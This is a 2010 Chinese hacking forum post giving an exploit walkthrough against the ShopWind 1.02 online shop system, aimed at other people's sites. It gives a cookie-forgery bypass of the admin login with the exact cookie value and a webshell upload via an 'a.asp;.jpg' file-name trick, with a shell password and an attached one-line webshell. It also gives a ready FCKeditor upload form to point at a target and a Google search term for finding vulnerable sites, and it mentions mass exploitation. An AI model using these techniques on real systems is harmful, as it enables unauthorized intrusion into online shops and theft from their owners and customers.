FROM http://www.st999.cn/blog http://forum.daokers.com/
BY 流浪的风 2010-4-15
程序shopwind网店系统1.02的
漏洞:cookies欺骗,上传漏洞,fckeditor编辑器漏洞
1) cookies欺骗进后台
程序做了防注入,防注入文件里过滤了post get cookie三种试,,我也就没找注入漏洞了。。。
看了下后台,竟然是cookie验证,文件是admin_judge.asp,源码如下:
<%
if request.cookies("admin_name")="" then
response.redirect "login.asp"
end if
%>
呵呵,,只要使admin_name不为空就行了,简单的很。。。
读取一下正常的cookies,并复制以下数据到啊D的cookie修改栏里,
visit=27743472; AQJXOZZHGGUGLWJSUNQM=RGQJLLVJKNHWGTOFRGZJNUXOPVMZVXFNYLDCTDYE; admin_name=admin
点击修改,见图
把login.asp去掉,直接回车登录,就进入后台管理页面了。。。
2)上传漏洞拿shell
点击商品添加,来到上传页面。
因为public目录下的uploadimg.asp文件做了图片验证,无法上传JPG格式的asp马,
直接cmd下用copy合并二进制就可上传,上传后的是a.asp;a.jpg格式,不改名。
而且还可以修改成这样的:admin/upfile/Upload.asp?action=ok&U_type=3&PicPath=a.asp
这个是需要本地构造,有兴趣的朋友还可以研究一下。
会在网站的根目录下会生成个imagesa.asp的文件夹,呵呵。。。上传漏洞危害太大哦。。。
本人愚笨,在YD的闷豆他们提醒下,才发现自己的平台搭建错误,用的是netbox,怪不得不能解析,又在熙雅MM的演示下,才悲哀的发现,原来自己一直喜欢用的那个一句话,还真不如lake2的一句话,所以,为了大家跟我走同样的错误的路,我直接上传上来了。。。
上传文件中的a.asp;.jpg就可以了,密码是st999,我的blog是http://www.st999.cn/blog,大家别社工我就成了,呵呵。。。
3)Fckeditor编辑器漏洞
这个洞不用说了,大家都知道的。。
利用:fckeditor/editor/filemanager/connectors/asp/upload.asp
利用源码:
<form id="frmUpload" enctype="multipart/form-data" action="http://www.st999.cn/blog/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
把www.st999.cn/blog改成你要拿的站的网址就可以了。。。
GOOGLE搜索关键字:intext:Powered by ShopWind
大家也可以换成别的关键字,搜索的程序也许会更多,好像是可以通杀这个程序的吧,我也没时间去试,熙雅这家伙已经去批量了,不知道还剩多少可以给大家玩呢,反正我是不搞批量的。。。
附件: lake2一句话.rar (15.62 K, 下载次数:64)
只显示10条记录相关文章
V5-SHOP商城0day (浏览: 9534, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12075, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 16026, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11760, 评论: 0)
良精所有产品通杀 (浏览: 8914, 评论: 0)
云起企业建站系统通杀oday (浏览: 11188, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12197, 评论: 0)
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法)) (浏览: 7460, 评论: 0)
又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行) (浏览: 8335, 评论: 0)